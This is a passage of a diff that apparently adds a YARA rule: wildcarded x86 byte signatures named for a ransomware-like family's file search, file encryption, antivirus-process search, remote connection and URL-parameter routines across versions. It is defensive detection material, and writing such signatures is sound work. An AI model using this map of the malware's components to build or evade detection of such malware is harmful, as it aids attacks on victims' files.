+            ?? 8D 49 ?? 57 FF 74 B5 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 46 83 FE ?? 72 ?? 8B 75 ??
+            EB ?? 83 7D ?? ?? 57 FF 33 C7 45 ?? ?? ?? ?? ?? 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 33 FF 15 ?? ?? ?? ?? EB ?? 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 33 FF D6
+            FF 45 ?? 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 75 ?? 8D 0C 41 B8 ?? ?? ?? ?? 81 F9 ?? ??
+            ?? ?? 89 4D ?? 0F 47 F0 89 75 ?? 8B 7D ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ??
+            FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 03 66 83 38 ?? 74
+            ?? 50 FF 15 ?? ?? ?? ?? 8B 0B 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D ?? 89 08 8B 35 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 7D ?? 85 FF 75
+            ?? 68 ?? ?? ?? ?? 57 FF 33 FF D6 8B C7 5F 5E 5B 8B E5 5D C2
+        }
+		$find_files_v4 = {
+            C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 0F 84 ?? ?? ??
+            ?? 8D 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 89 44 24
+            ?? 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 04
+            46 89 44 24 ?? FF D7 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24
+            ?? 66 89 11 83 F8 ?? 75 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B
+            E5 5D C3 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF D7 F6
+            44 24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74
+            ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56
+            FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 53 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 83
+            C4 ?? 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E
+            33 C0 5B 8B E5 5D C3
+        }
+		$crypt_files_v4 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 68 ?? ?? ?? ?? 33 DB 89 4D ?? 68 ?? ?? ??
+            ?? 53 8B F2 89 5D ?? FF 15 ?? ?? ?? ?? 8B F8 8D 55 ?? 56 57 8D 4D ?? 89 7D ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B
+            8B E5 5D C3 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ??
+            8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 88 5D ?? 48 75 ?? 8B 45 ?? 89 85 ??
+            ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B
+            45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8B 45 ?? 68 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 68
+            ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 5D ?? 89 5D ?? 8B 1D ?? ?? ?? ?? 6A ?? C7 05 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? FF D3 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            89 45 ?? FF D3 33 C9 8B D8 89 4D ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? 56 FF
+            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 3D
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 0F 42 CA 01 87 ?? ?? ?? ?? 8B 55 ?? 83 97 ?? ?? ?? ?? ??
+            8B 7D ?? 89 4D ?? 8D 8D ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B C7 F7 D8 99 6A
+            ?? 6A ?? 52 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50
+            57 53 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57
+            53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 8B 7D ?? 85 C9 0F 84 ?? ?? ?? ?? 6A ??
+            8D 45 ?? 50 68 ?? ?? ?? ?? 57 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? 89
+            45 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ??
+            ?? 8B 5D ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3
+        }
+		$crypt_files_v3 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45
+            ?? ?? ?? ?? ?? 50 6A ?? 8B D9 8B CA 6A ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 8B F8 C7 45 ?? ?? ?? ?? ?? 53 57 89 7D ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ??
+            ?? ?? 66 0F 6F 05 ?? ?? ?? ?? BA ?? ?? ?? ?? F3 0F 7F 85 ?? ?? ?? ?? 51 66 0F 6F 05
+            ?? ?? ?? ?? 8D 4D ?? F3 0F 7F 45 ?? C6 45 ?? ?? 66 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45
+            ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 F3 0F 6F 85 ?? ?? ?? ?? 8B F8 6A ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? F3 0F 7F 07 6A ?? F3 0F 6F 45 ?? 89 7D ?? F3 0F 7F 47 ?? FF D6
+            F3 0F 6F 45 ?? 68 ?? ?? ?? ?? 89 45 ?? F3 0F 7F 00 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50
+            57 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ??
+            85 C0 75 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? EB ?? 68 ??
+            ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
+            FF 15 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 8B 75 ?? 8B 5D ?? E9 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ??
+            ?? 6A ?? FF 75 ?? FF D7 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 0F 57 C0 66 0F 13 45 ??
+            8B 75 ?? 8B 5D ?? E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D6 6A ?? 8B D8
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? C7 03 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF D6 8B
+            3D ?? ?? ?? ?? 33 F6 33 C9 89 45 ?? 89 4D ?? EB ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 68 ??
+            ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84
+            ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            0F 42 F1 01 03 83 53 ?? ?? 8B 45 ?? 89 45 ?? 89 45 ?? A8 ?? 74 ?? 8B FF 40 A8 ?? 75
+            ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF 75 ?? 89 45 ?? FF 75
+            ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8D 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 4D ?? 8B 45 ??
+            F7 D9 6A ?? 83 D0 ?? 6A ?? F7 D8 50 51 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15
+            ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75
+            ?? BE ?? ?? ?? ?? 89 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 85 F6 0F 84 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 4D ?? 8B 75 ?? 85 C9 75 ?? 51 8D 45 ?? 50
+            68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75
+            ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 53 56 FF 15 ?? ?? ?? ?? 56 FF 15 ??
+            ?? ?? ?? 8B 03 8B 73 ?? 68 ?? ?? ?? ?? 6A ?? 53 89 45 ?? FF D7 68 ?? ?? ?? ?? 6A ??
+            FF 75 ?? FF D7 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 5D ?? 68 ?? ?? ?? ?? 6A ?? FF
+            75 ?? FF D7 5F 8B D6 8B C3 5E 5B 8B E5 5D C3
+        }
+		$search_antivirus_processes_v5 = {
+            8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF
+            D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB ?? 56 33 C9 89
+            5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F
+            85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ??
+            8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D 58 ?? 8D 46 ??
+            50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 37 FF 15
+            ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D 0C 41 8B 45 ??
+            81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0
+            74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07 33 C9 66 39 08
+            74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D ?? 89 08 68 ??
+            ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 85 DB 75 ??
+            68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2
+        }
+		$find_files_v5 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39
+            7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9
+            ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ??
+            89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50
+            6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74
+            ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF
+            15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ??
+            85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ??
+            ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE
+            E8 ?? ?? ?? ?? 59 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ??
+            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ??
+            ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
+        }
+		$crypt_files_v5 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ??
+            ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? FF 75
+            ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? EB ??
+            33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB
+            ?? 75 ?? 33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
+            ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15
+            ?? ?? ?? ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ?? ?? ?? 21 7D ?? 21 7D ?? 41 89 45 ??
+            8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ?? ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ??
+            89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A
+            ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ??
+            83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33
+            C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75
+            ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ??
+            8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86
+            ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33 C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D
+            ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ??
+            ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ??
+            E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ??
+            85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ??
+            ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ??
+            ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75 ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45
+            ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01 8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF
+            70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B
+            8B E5 5D C3
+        }
+		$remote_connection_v5 = {
+            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3
+            8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ??
+            ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
+            83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68
+            ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF
+            75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 47 EB ?? FF
+            15 ?? ?? ?? ?? 8B 45 ?? 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B
+            E5 5D C2
+        }
+		$remote_connection_v5_0_1 = {
+            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3
+            8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ??
+            ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
+            83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68
+            ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF
+            75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 33 C9 41 85 C0 8B 45 ?? 0F 45
+            F9 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2
+        }
+		$url_parameters_setup_v5 = {
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
+            ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
+            75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ??
+            ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A
+            ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B E5 5D C3
+        }
+		$url_parameters_setup_v5_0_1 = {
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
+            ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
+            75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68
